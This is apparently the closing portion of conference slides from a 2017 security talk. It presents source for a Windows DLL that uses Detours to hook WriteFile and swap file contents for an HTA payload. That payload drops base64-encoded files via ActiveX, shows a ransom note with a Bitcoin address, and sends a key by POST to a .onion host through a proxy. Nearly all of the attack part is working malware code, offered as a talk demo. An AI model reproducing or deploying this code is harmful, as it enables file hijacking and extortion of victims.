LSYodiY6UkoPM8XZBZvmfvvgpXnheuin1795Rn6oKQPpi7UEvZkZmVXVmxuyrXi6rdFZXZWZqAUXJfzNFrpghyXFXb13ixvcqV4xaQRHYkGgV5uWt8yM0zClIxm1j9BYwao5tetXoJZOqNYfpVqZeAqAGk4ARS8IK4YEMKOunGwX7WVEPh7j15fGe9F3ceP7lnKFwK7G7BoZv3n7s+59/N9+Bu/mfX8/s3D7kFq9E3WYvJcevR0/ev3n7bqHCipqam5oT6+O3tq/dPH93SL58tDX1CtOt9+Paz1+8+fn2zSeHG1dOnr95QH998/fju9bPbh7XrvWolkKQKHPsvPnz54cunzQqnzly7fv3amVPq4dOXDy8fXtzvUAUrAIQ2UmMq+XvlwYsNKkePX7509uyly
8ePaucXD678Lqn9i3JIUVw4S/4cPF+gcazg5LkLF86dLDimvzh/8EeJU3GwGBx4hLZXareF1h1Y5+ZIdXV19ZHa44HvtEWpWsdZiAdmYKrayJxrA+BUG1mS2l1FxMQGavX/W2XbdmqrBIfJtvo0446T3O1bwJjwutt9+ATjgBjNWEAfEmPjMc44slo2DziyqHlLz0EahhYRZPU3FK0U0QJhHmN3hIBmsf7HbttmXmNXzaNdG5v5YG/fpjNMVgGhA9KX9PNdHfpFTsMQwWzZEAUR6f29l5P+6eoPfvYZYRmiBtgjM3p1keUuvTIi7QN81p9/3AT9SNQC/WYAAAAASUVORK5CYII=';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_3.png', 2),c.close();}if(!f.FileExists(t+'\\icon_4.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='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';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_4.png', 2),c.close();}if(!f.FileExists(t+'\\icon_5.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='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';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_5.png', 2),c.close();}</script><script>window.resizeTo(screen.availWidth*0.95,screen.availHeight*0.95);window.moveTo(screen.availWidth*0.025,screen.availHeight*0.025);r=\"<center><br><br><h1>You have been owned by AverageJoe</h1><br><br><h2> CactusCon 2017 baby!</h2><br><br><h3>oh and pay me BTC. Send them to 1LmQSUfu3KPCLhj26Y4RJVci3FNum51YSR and email [email protected] when done</h3><center>\";d=\"http://5pr6hirtlfan3j76.onion/\";try{h=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");h.setProxy(2,\"31.192.105.180:8123\",0);h.setTimeouts(10000,10000,60000,60000);h.open(\"POST\",d+\"?\"+Math.random(),0);h.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");h.send('key=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');document.write(h.responseText);}catch(e){document.write(r);}</script></body></html><div style='height:0;display:none'>";
		return Real_Write_File(passedhandle, me, strlen(me), numbyteswritten, lpOverlapped);
	}
	return Real_Write_File(passedhandle, lpBuffer, numbytes2write, numbyteswritten, lpOverlapped);
}



// Detours' withdll.exe / DetourCreateProcessWithDll() require the injected DLL
// to export at least one function at ordinal 1. This is that export. It is
// never called; the body is a pointless busy loop in 32-bit inline asm (the
// original had a stray 'pop ebx' with no matching push, removed here).
extern "C" __declspec(dllexport) void DoNothingAlready(void)
{
#if defined(_M_IX86)
	DWORD ayylmao = 20345;
	_asm
	{
		xor eax, eax
		xor ecx, ecx
		mov eax, ayylmao
	testd:
		mov edx, 234
		xchg edx, ebx
		xor ebx, ebx
		inc ecx
		cmp eax, ecx
		jnz testd
		nop
	}
#endif
	return;
}

BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved)
{
	if (DetourIsHelperProcess()) {
		return TRUE;
	}

	if (dwReason == DLL_PROCESS_ATTACH) {
		DetourRestoreAfterWith();
		DetourTransactionBegin();
		DetourUpdateThread(GetCurrentThread());
		DetourAttach(&(PVOID&)Real_Write_File, Detour_WriteFile);
		DetourTransactionCommit();
	}
	else if (dwReason == DLL_PROCESS_DETACH) {
		DetourTransactionBegin();
		DetourUpdateThread(GetCurrentThread());
		DetourDetach(&(PVOID&)Real_Write_File, Detour_WriteFile);
		DetourTransactionCommit();
	}
	return TRUE;
}

Does it work? Video INC

The other one

Questions?

Thank You!

twitter: @Gironsec

Website: https://gironsec.com

email: [email protected]

All code here: https://github.com/joseph-giron